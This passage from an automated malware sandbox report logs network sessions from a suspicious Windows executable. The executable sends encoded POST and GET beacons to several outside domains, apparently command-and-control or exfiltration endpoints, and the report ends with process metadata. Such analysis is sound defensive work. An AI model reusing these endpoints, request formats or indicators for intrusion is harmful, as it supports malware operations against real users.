56 39 67 6c 66 39 58 47 47 69 32 44 69 51 47 54 78 6c 4b 73 30 68 4c 5a 44 6c 43 38 30 64 6f 67 33 67 70 62 7a 46 4c 44 5a 35 5a 33 45 51 75 67 46 61 37 31 74 75 7a 32 38 63 77 53 45 50 75 4c 58 45 43 58 52 44 72 38 30 47 68 48 4b 4c 6d 79 6c 4f 4a 57 73 71 66 4b 33 4c 73 64 71 6d 4f 46 71 50 53 5a 57 78 2f 62 4f 46 2f 56 33 36 52 6f 37 6b 2f 59 77 63 79 32 4a 34 72 35 30 6c 70 Data Ascii: oxIxzhP=CWi2LxdIHyDkiC1x9G5ZcVe+KJMuePxea9dw0GfYwGv//ts78AAVaDWTg8T8qAYgyesfHy4weIZdrVQhJ5y9HNrpdeskfV9glf9XGGi2DiQGTxlKs0hLZDlC80dog3gpbzFLDZ5Z3EQugFa71tuz28cwSEPuLXECXRDr80GhHKLmylOJWsqfK3LsdqmOFqPSZWx/bOF/V36Ro7k/Ywcy2J4r50lp
Jan 11, 2025 08:00:42.176539898 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50007	13.248.169.48	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:44.278764963 CET	1740	OUT	POST /qp0h/ HTTP/1.1 Host: www.lirio.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.lirio.shop Referer: http://www.lirio.shop/qp0h/ Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 43 57 69 32 4c 78 64 49 48 79 44 6b 69 43 31 78 39 47 35 5a 63 56 65 2b 4b 4a 4d 75 65 50 78 65 61 39 64 77 30 47 66 59 77 47 33 2f 2f 34 67 37 39 6e 30 56 5a 44 57 54 6f 63 54 6f 71 41 59 48 79 65 30 62 48 79 31 46 65 4e 64 64 72 77 45 68 59 62 4b 39 55 74 72 70 52 2b 73 6e 56 31 39 51 6c 66 4e 54 47 47 79 32 44 69 51 47 54 33 4a 4b 6f 6e 35 4c 66 44 6c 44 2f 30 64 65 71 58 67 42 62 7a 63 32 44 5a 31 4a 32 33 49 75 6a 6c 4b 37 33 66 47 7a 73 38 63 2b 54 45 4f 39 4c 58 34 64 58 52 50 64 38 31 79 4c 48 4e 2f 6d 78 44 50 7a 4e 49 32 77 49 58 62 4a 65 64 6d 30 5a 4e 44 54 47 33 68 66 63 74 39 69 49 6c 6d 6c 76 73 59 51 56 45 4e 59 75 75 34 61 77 79 55 57 42 30 42 30 70 55 70 35 74 30 76 35 72 58 48 2b 76 4c 53 59 4d 6a 4f 71 36 6f 39 78 38 53 69 44 30 38 52 6e 30 47 43 31 73 36 34 36 4b 62 74 75 35 77 2f 6a 55 51 68 2b 67 47 2b 56 53 58 72 37 4d 66 74 33 42 6e 31 73 34 6d 47 6d 51 59 61 69 6a 64 73 74 34 43 64 64 37 47 66 76 75 37 56 57 6d 6b 62 61 45 42 6d 53 38 49 67 59 50 50 [TRUNCATED] Data Ascii: oxIxzhP=CWi2LxdIHyDkiC1x9G5ZcVe+KJMuePxea9dw0GfYwG3//4g79n0VZDWTocToqAYHye0bHy1FeNddrwEhYbK9UtrpR+snV19QlfNTGGy2DiQGT3JKon5LfDlD/0deqXgBbzc2DZ1J23IujlK73fGzs8c+TEO9LX4dXRPd81yLHN/mxDPzNI2wIXbJedm0ZNDTG3hfct9iIlmlvsYQVENYuu4awyUWB0B0pUp5t0v5rXH+vLSYMjOq6o9x8SiD08Rn0GC1s646Kbtu5w/jUQh+gG+VSXr7Mft3Bn1s4mGmQYaijdst4Cdd7Gfvu7VWmkbaEBmS8IgYPP3gFTlbzDlrLvR36FVCNzIqnare0abyNVkT9Bm5KdETLxZGM5Omzd2LKbg9x0+h7pnShWm4ffbvfjCtt8PdcB6u/2Wkdzp4MqaqMlPe57FmVDfce3bVK+A2QhMPwUFYtOPcuUhYhEgxdr3Q8UesYkKXorInQ5bed1J6CkKOs8grzEmi4bOWrNLpLoLRAMK4uxogTH0eHnIQddKNrRrWobkH7gEslOZfFJznsc070dmGVueL6cSaLfk3/e2pkRk0CJ0RppVuWyMz/9oyKQ/qZgQdITGaFSTFA7NiuH7TFw3Fd/4eAR/ucpwy6Sra3yQl+gGQDpFsosjOipwKIxY+TSUl18Nu4zpEJNqHWkPx6BtE6kyl/rT8AkxdGHmIRT1hBB9d9guxbD3+YvS3d8C8GtHYk853DpCRJq4br3fzKulb69fN21Uqo3oQFEOfr7pPkVNnIHRLiMIySO1sobrh4fIRwTouOefFGfBPOjqut0F+ui7XyRhfddOuzHV8+IPB0bM7TniUv/C1dbt0IVmHV567GCIXm61zc90S1GXX5NbhGSlgbGn7QPggDa5MEaQ5UNt2GSbLpo4OjpWFDvPl48kkK9Taej8ijul4qyXFsUQJ7z3+zN070WsX2T6Ves3P/eDfGkLWTxV0VquEpZ8U884pId+gdajy2TlZ [TRUNCATED]
Jan 11, 2025 08:00:44.741954088 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50008	13.248.169.48	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:46.820561886 CET	447	OUT	GET /qp0h/?oxIxzhP=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IFK6iZdJZQiZM2owifTnJNmV7NHM+mXk/YCpC72xdsXduFg==&qHO8p=hd0DQ8 HTTP/1.1 Host: www.lirio.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 08:00:47.275473118 CET	389	IN	HTTP/1.1 200 OK content-type: text/html date: Sat, 11 Jan 2025 07:00:47 GMT content-length: 268 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 78 49 78 7a 68 50 3d 50 55 4b 57 49 48 52 45 50 53 37 57 6f 56 39 59 37 6a 42 77 44 41 69 38 4d 64 4a 76 62 50 6c 4a 5a 39 52 56 39 48 4f 4c 31 33 6d 42 6e 50 41 77 7a 51 67 5a 48 44 57 51 6e 59 53 34 6c 57 59 41 78 50 4d 35 48 51 35 4e 65 34 70 44 75 6b 45 69 52 70 32 49 46 4b 36 69 5a 64 4a 5a 51 69 5a 4d 32 6f 77 69 66 54 6e 4a 4e 6d 56 37 4e 48 4d 2b 6d 58 6b 2f 59 43 70 43 37 32 78 64 73 58 64 75 46 67 3d 3d 26 71 48 4f 38 70 3d 68 64 30 44 51 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oxIxzhP=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IFK6iZdJZQiZM2owifTnJNmV7NHM+mXk/YCpC72xdsXduFg==&qHO8p=hd0DQ8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50009	3.33.130.190	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:52.335611105 CET	721	OUT	POST /4knb/ HTTP/1.1 Host: www.espiritismo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.espiritismo.info Referer: http://www.espiritismo.info/4knb/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 70 45 4a 38 2f 6f 75 39 49 69 6f 36 67 37 73 31 43 31 78 74 77 33 33 4c 37 75 77 6b 35 36 58 69 37 77 6d 6f 4f 75 4b 6a 66 32 39 64 73 4f 76 57 52 77 55 54 51 7a 6d 41 52 4f 5a 64 78 50 75 56 69 6b 44 68 76 4c 6f 47 53 4f 35 75 7a 31 55 4b 62 48 41 61 79 33 47 46 55 69 48 4d 39 70 64 68 56 43 4e 51 58 6c 4f 44 32 58 4f 38 4f 50 33 64 53 38 4c 33 32 68 6c 71 4b 4d 49 6b 75 68 31 50 6d 38 33 6c 68 79 35 70 42 62 35 4f 50 37 77 79 35 4d 42 72 4e 50 6d 4f 75 6d 64 36 43 76 69 4d 52 65 6c 7a 4b 42 2b 71 67 55 6e 6e 37 44 6c 47 42 53 35 50 57 45 73 48 78 72 58 6a 68 5a 47 4c 66 56 4a 6d 67 6f 51 3d Data Ascii: oxIxzhP=pEJ8/ou9Iio6g7s1C1xtw33L7uwk56Xi7wmoOuKjf29dsOvWRwUTQzmAROZdxPuVikDhvLoGSO5uz1UKbHAay3GFUiHM9pdhVCNQXlOD2XO8OP3dS8L32hlqKMIkuh1Pm83lhy5pBb5OP7wy5MBrNPmOumd6CviMRelzKB+qgUnn7DlGBS5PWEsHxrXjhZGLfVJmgoQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50010	3.33.130.190	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:55.031445026 CET	741	OUT	POST /4knb/ HTTP/1.1 Host: www.espiritismo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.espiritismo.info Referer: http://www.espiritismo.info/4knb/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 70 45 4a 38 2f 6f 75 39 49 69 6f 36 6a 62 38 31 42 53 6c 74 38 48 33 49 30 4f 77 6b 7a 61 58 6d 37 77 61 6f 4f 71 54 6b 66 6c 5a 64 73 76 66 57 53 78 55 54 46 7a 6d 41 65 75 5a 59 2f 76 75 6f 69 6b 66 54 76 4a 38 47 53 4e 46 75 7a 33 38 4b 63 77 73 5a 39 48 48 6a 5a 43 48 4f 7a 4a 64 68 56 43 4e 51 58 6d 7a 57 32 58 57 38 4f 66 48 64 54 64 4c 34 70 52 6c 74 4a 4d 49 6b 71 68 31 78 6d 38 33 4c 68 7a 30 4d 42 59 52 4f 50 37 41 79 67 39 42 6f 61 66 6d 4d 7a 32 63 34 53 76 54 62 49 2b 34 2f 4c 52 36 73 2b 69 57 63 36 31 55 73 62 77 78 6e 46 6b 41 2f 68 34 66 55 77 70 6e 69 46 32 5a 57 2b 2f 48 48 75 70 61 31 76 38 6f 4b 32 71 6d 42 58 4e 64 4b 54 30 48 62 Data Ascii: oxIxzhP=pEJ8/ou9Iio6jb81BSlt8H3I0OwkzaXm7waoOqTkflZdsvfWSxUTFzmAeuZY/vuoikfTvJ8GSNFuz38KcwsZ9HHjZCHOzJdhVCNQXmzW2XW8OfHdTdL4pRltJMIkqh1xm83Lhz0MBYROP7Ayg9BoafmMz2c4SvTbI+4/LR6s+iWc61UsbwxnFkA/h4fUwpniF2ZW+/HHupa1v8oK2qmBXNdKT0Hb
Jan 11, 2025 08:00:55.391676903 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50011	3.33.130.190	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:57.688364029 CET	1758	OUT	POST /4knb/ HTTP/1.1 Host: www.espiritismo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.espiritismo.info Referer: http://www.espiritismo.info/4knb/ Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 70 45 4a 38 2f 6f 75 39 49 69 6f 36 6a 62 38 31 42 53 6c 74 38 48 33 49 30 4f 77 6b 7a 61 58 6d 37 77 61 6f 4f 71 54 6b 66 6c 52 64 72 59 33 57 52 53 73 54 44 44 6d 41 41 2b 5a 5a 2f 76 75 50 69 6b 57 59 76 4a 78 7a 53 49 4a 75 79 55 45 4b 5a 45 34 5a 71 33 48 6a 46 79 48 50 39 70 64 6f 56 43 64 71 58 6d 6a 57 32 58 57 38 4f 63 66 64 55 4d 4c 34 76 52 6c 71 4b 4d 49 53 75 68 31 4b 6d 38 2f 39 68 7a 77 32 41 6f 78 4f 4d 66 73 79 37 76 35 6f 46 76 6d 53 77 32 63 61 53 76 65 63 49 2b 6c 4f 4c 53 6e 37 2b 6c 36 63 34 6a 35 55 65 6b 39 77 57 57 4a 62 6c 36 4c 59 6b 5a 7a 53 50 32 39 6a 2f 49 75 6d 6b 35 4f 36 69 34 45 38 7a 37 54 36 45 4a 63 65 61 67 53 71 48 2b 66 67 39 62 43 39 53 59 37 45 35 6f 64 2b 37 72 6d 39 46 45 2f 43 58 79 7a 70 44 74 7a 62 69 76 67 2b 42 4b 4a 71 6a 62 37 49 71 67 56 4c 41 73 7a 65 36 39 2f 6c 51 5a 77 4d 4c 63 7a 55 69 58 63 53 32 31 2b 2f 79 5a 62 66 45 4d 33 49 58 51 71 4d 4b 74 6c 6f 51 57 42 47 52 42 6a 6d 71 33 74 34 32 4d 43 59 47 62 66 62 4a 46 [TRUNCATED] Data Ascii: oxIxzhP=pEJ8/ou9Iio6jb81BSlt8H3I0OwkzaXm7waoOqTkflRdrY3WRSsTDDmAA+ZZ/vuPikWYvJxzSIJuyUEKZE4Zq3HjFyHP9pdoVCdqXmjW2XW8OcfdUML4vRlqKMISuh1Km8/9hzw2AoxOMfsy7v5oFvmSw2caSvecI+lOLSn7+l6c4j5Uek9wWWJbl6LYkZzSP29j/Iumk5O6i4E8z7T6EJceagSqH+fg9bC9SY7E5od+7rm9FE/CXyzpDtzbivg+BKJqjb7IqgVLAsze69/lQZwMLczUiXcS21+/yZbfEM3IXQqMKtloQWBGRBjmq3t42MCYGbfbJFC8RppxYQ9pa7E1K8t0sMp9AyexSfRw8SiVLRyZHqs9fhfjEOP4/Z5G63VzCEn7srXPMbRiRzaBbRiB3/EuDOsUFaWFj1cP5B5MINjxRKqxLSyUnSwYqlphbkAJuiBvWdPPgLEHdPQX+M1i2gYslJBeUvStgva+zxYyd0r5/MygY2r3RPjAeLq/OKMSL5nMmBWfy1FAZCbzwH5a9XJAQLhggYF3rKMuhcQlbrkk3RPBa0Og0etl6M15N3mdui/5PMvVodntjoJKfGay4iZ2VlVEM9ENBuozQjJph+QVPUztKiPEQUK4XFa2VAyVRLSIwNHqkxD5SY49tXwIDWNG/m/mNovZOGboQ3eQTPnxpBb75IhFrtvJlVS6xBi2/HJlEleLYp3vPoZC8uUYPy9jLQlpXkinL6b0t/+GxNc/JhknvCBxpoqfQMshJDgaRl4AVTUH38A5GGRbivR6K5aDjgaHm+KrAHrOfnWeGiHEvOhgl/H16xfcZqbkctAlR8QVoFQ6dVvOZGu0qZhUMwuc21v7PKePSnZvyRc5KP8GZnKDtvoce+Z+kFoqQiN+kFaVdFPcmNTenyDAMswVFnlZA0d1WT+vwWCvFsZh8qHeXa8OVlYXpRNsu7ooltbabejb8Eo7bKQkzauI5WF5sPvlpEHerJzvQpQG1TA/ [TRUNCATED]
Jan 11, 2025 08:00:58.126909971 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50012	3.33.130.190	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:01:00.252367973 CET	453	OUT	GET /4knb/?oxIxzhP=kGhc8cujIy468LEjHl1Bq2PU7Nse09viwjWSLKXwC1cEp+jXGgMaezOIe4V7ze6PoEjekagOfdxn4kQRbl8p+V6gWBX36oJLUl4+OD7m+QqDQo/RbffNhAc3ONEmviUo1g==&qHO8p=hd0DQ8 HTTP/1.1 Host: www.espiritismo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 08:01:01.694276094 CET	389	IN	HTTP/1.1 200 OK content-type: text/html date: Sat, 11 Jan 2025 07:01:01 GMT content-length: 268 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 78 49 78 7a 68 50 3d 6b 47 68 63 38 63 75 6a 49 79 34 36 38 4c 45 6a 48 6c 31 42 71 32 50 55 37 4e 73 65 30 39 76 69 77 6a 57 53 4c 4b 58 77 43 31 63 45 70 2b 6a 58 47 67 4d 61 65 7a 4f 49 65 34 56 37 7a 65 36 50 6f 45 6a 65 6b 61 67 4f 66 64 78 6e 34 6b 51 52 62 6c 38 70 2b 56 36 67 57 42 58 33 36 6f 4a 4c 55 6c 34 2b 4f 44 37 6d 2b 51 71 44 51 6f 2f 52 62 66 66 4e 68 41 63 33 4f 4e 45 6d 76 69 55 6f 31 67 3d 3d 26 71 48 4f 38 70 3d 68 64 30 44 51 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oxIxzhP=kGhc8cujIy468LEjHl1Bq2PU7Nse09viwjWSLKXwC1cEp+jXGgMaezOIe4V7ze6PoEjekagOfdxn4kQRbl8p+V6gWBX36oJLUl4+OD7m+QqDQo/RbffNhAc3ONEmviUo1g==&qHO8p=hd0DQ8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50013	199.192.23.123	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:01:06.746052027 CET	721	OUT	POST /8hma/ HTTP/1.1 Host: www.mindfulsteps.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.mindfulsteps.xyz Referer: http://www.mindfulsteps.xyz/8hma/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 4b 53 58 6b 74 51 2f 33 4f 72 47 50 6a 63 79 72 78 59 39 6f 75 67 52 39 4e 79 37 42 53 63 42 64 51 46 79 67 52 4c 35 4d 32 45 38 73 65 65 73 4d 72 4c 74 75 6d 47 6c 54 59 75 6e 57 66 79 56 76 46 4f 37 76 4d 6d 46 55 74 6f 62 6c 58 30 47 77 73 6f 42 50 52 76 43 41 61 31 6b 45 32 79 71 35 34 6b 6c 66 50 37 61 66 43 77 79 49 49 79 39 6d 73 36 59 51 32 6f 48 71 50 52 37 68 7a 62 47 4a 41 4a 70 32 7a 72 38 7a 6b 6e 4d 30 43 50 33 62 71 6b 53 52 2b 6c 68 5a 33 6a 31 2f 4f 39 4e 32 66 6f 6b 74 53 4b 65 66 6b 75 51 64 30 71 58 57 53 4e 63 6b 58 4a 2f 75 6e 4d 75 58 33 57 75 5a 56 61 6c 62 50 4c 67 3d Data Ascii: oxIxzhP=KSXktQ/3OrGPjcyrxY9ougR9Ny7BScBdQFygRL5M2E8seesMrLtumGlTYunWfyVvFO7vMmFUtoblX0GwsoBPRvCAa1kE2yq54klfP7afCwyIIy9ms6YQ2oHqPR7hzbGJAJp2zr8zknM0CP3bqkSR+lhZ3j1/O9N2foktSKefkuQd0qXWSNckXJ/unMuX3WuZValbPLg=
Jan 11, 2025 08:01:07.359812021 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 07:01:07 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50014	199.192.23.123	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:01:09.301122904 CET	741	OUT	POST /8hma/ HTTP/1.1 Host: www.mindfulsteps.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.mindfulsteps.xyz Referer: http://www.mindfulsteps.xyz/8hma/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 4b 53 58 6b 74 51 2f 33 4f 72 47 50 68 38 69 72 7a 35 39 6f 6f 41 52 38 42 53 37 42 41 63 42 5a 51 46 4f 67 52 4b 4d 52 32 53 55 73 65 2f 63 4d 71 4b 74 75 6e 47 6c 54 41 2b 6e 66 52 53 56 6b 46 4f 6d 59 4d 6a 39 55 74 6f 50 6c 58 32 4f 77 72 62 5a 49 44 76 43 43 42 6c 6b 47 38 53 71 35 34 6b 6c 66 50 37 65 6c 43 77 4b 49 4a 42 31 6d 74 66 34 52 2b 49 47 59 5a 42 37 68 33 62 47 4e 41 4a 70 75 7a 71 77 5a 6b 6b 6b 30 43 4d 6a 62 71 31 53 65 33 6c 67 51 71 54 30 71 42 38 6b 4f 58 72 35 6d 52 37 47 66 33 6f 67 6c 78 63 6d 38 49 76 55 4d 45 70 54 57 33 66 6d 67 6d 6d 50 77 50 35 31 72 52 63 30 4e 2b 7a 2f 64 50 41 7a 79 4d 5a 71 4f 54 6a 72 37 37 48 48 4c Data Ascii: oxIxzhP=KSXktQ/3OrGPh8irz59ooAR8BS7BAcBZQFOgRKMR2SUse/cMqKtunGlTA+nfRSVkFOmYMj9UtoPlX2OwrbZIDvCCBlkG8Sq54klfP7elCwKIJB1mtf4R+IGYZB7h3bGNAJpuzqwZkkk0CMjbq1Se3lgQqT0qB8kOXr5mR7Gf3oglxcm8IvUMEpTW3fmgmmPwP51rRc0N+z/dPAzyMZqOTjr77HHL
Jan 11, 2025 08:01:09.917073965 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 07:01:09 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Target ID:	0
Start time:	01:58:03
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\rACq8Eaix6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rACq8Eaix6.exe"
Imagebase:	0xbd0000
File size:	1'225'216 bytes
MD5 hash:	E3779C9167A86C1CAD7BD494BB7FD15A
Has elevated privileges:	true
